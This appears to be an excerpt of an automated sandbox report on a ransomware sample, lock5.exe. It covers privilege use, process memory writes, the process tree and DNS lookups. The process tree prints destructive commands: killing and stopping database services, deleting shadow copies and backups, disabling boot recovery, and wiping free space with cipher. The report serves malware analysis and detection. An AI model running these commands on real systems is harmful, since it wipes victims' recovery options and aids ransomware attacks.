N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3120 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3120 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3120 wrote to memory of 944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 4428 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 4112 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4112 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4112 wrote to memory of 3288 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 948 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 948 wrote to memory of 1076 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1076 wrote to memory of 4952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1076 wrote to memory of 4952 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 5052 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 5052 wrote to memory of 4568 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 4568 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 4568 wrote to memory of 2068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3520 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3520 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2728 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2728 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 5100 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 5100 wrote to memory of 1056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1056 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1056 wrote to memory of 1740 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2552 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2552 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 1260 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 1260 wrote to memory of 3860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 752 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 752 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2872 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2872 wrote to memory of 4528 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 3128 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 3128 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 3128 wrote to memory of 2220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
PID 2220 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2220 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1720 N/A C:\Users\Admin\AppData\Local\Temp\lock5.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\lock5.exe

"C:\Users\Admin\AppData\Local\Temp\lock5.exe"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlbrowser.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sql writer.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlserv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msmdsrv.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im MsDtsSrvr.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im sqlceip.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdlauncher.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im Ssms.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE

C:\Windows\system32\taskkill.exe

taskkill -f -im SQLAGENT.EXE

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im fdhost.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im ReportingServicesService.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im msftesql.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe

C:\Windows\system32\taskkill.exe

taskkill -f -im pg_ctl.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe

C:\Windows\system32\taskkill.exe

taskkill -f -impostgres.exe

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100

C:\Windows\system32\net.exe

net stop MSSQLServerADHelper100

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS

C:\Windows\system32\net.exe

net stop MSSQL$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW

C:\Windows\system32\net.exe

net stop MSSQL$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop MSSQL$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS

C:\Windows\system32\net.exe

net stop SQLAgent$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW

C:\Windows\system32\net.exe

net stop SQLAgent$MSFW

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLAgent$MSFW

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser

C:\Windows\system32\net.exe

net stop SQLBrowser

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLBrowser

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS

C:\Windows\system32\net.exe

net stop REportServer$ISARS

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop REportServer$ISARS

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c net stop SQLWriter

C:\Windows\system32\net.exe

net stop SQLWriter

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop SQLWriter

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\SysWOW64\cmd.exe

\\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\system32\wbadmin.exe

wbadmin delete backup -keepVersion:0 -quiet

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoverynabled No

C:\Windows\system32\wbadmin.exe

wbadmin DELETE SYSTEMSTABACKUP -deleteOldest

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\lock5.exe

\\?\C:\Users\Admin\AppData\Local\Temp\lock5.exe -network

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c pause

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\A:

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\C:

C:\Windows\SYSTEM32\cipher.exe

cipher /w:\\?\F:

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.49.80.91.in-addr.arpa udp

Files

N/A